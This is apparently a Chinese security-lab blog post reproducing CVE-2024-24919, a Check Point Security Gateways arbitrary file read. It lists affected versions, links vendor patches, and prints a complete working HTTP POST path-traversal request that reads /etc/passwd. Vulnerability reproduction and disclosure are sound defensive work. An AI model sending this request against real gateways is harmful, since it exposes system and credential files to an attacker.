【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)

原创 弥天安全实验室 弥天安全实验室 2024-05-31 18:32

网安引领时代，弥天点亮未来   

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！
0x01漏洞介绍Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。0x02影响版本1、 Check Point Security Gateways R77.20 (EOL) 2、 Check Point Security Gateways R77.30 (EOL) 3、 Check Point Security Gateways R80.10 (EOL) 4、 Check Point Security Gateways R80.20 (EOL) 5、 Check Point Security Gateways R80.20.x 6、 Check Point Security Gateways R80.20SP (EOL) 7、 Check Point Security Gateways R80.30 (EOL) 8、 Check Point Security Gateways R80.30SP (EOL) 9、 Check Point Security Gateways R80.40 (EOL) 10、 Check Point Security Gateways R81 11、 Check Point Security Gateways R81.10 12、 Check Point Security Gateways R81.10.x 13、 Check Point Security Gateways R81.200×03漏洞复现
1.访问漏洞环境

2.对漏洞进行复现 POC （POT）漏洞复现POST /clients/MyCRL HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeContent-Length: 39Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipaCSHELL/../../../../../../../etc/passwd     读取/etc/passwd成功3.nuclei工具测试（漏洞存在）Yakit工具加载nuclei文件测试漏洞存在0x04修复建议目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://support.checkpoint.com/results/sk/sk182336https://ti.qianxin.com/vulnerability/detail/354207https://www.cnnvd.org.cn/home/loophole弥天简介学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。口号 网安引领时代，弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫，予以风动，必降弥天之润！   弥  天安全实验室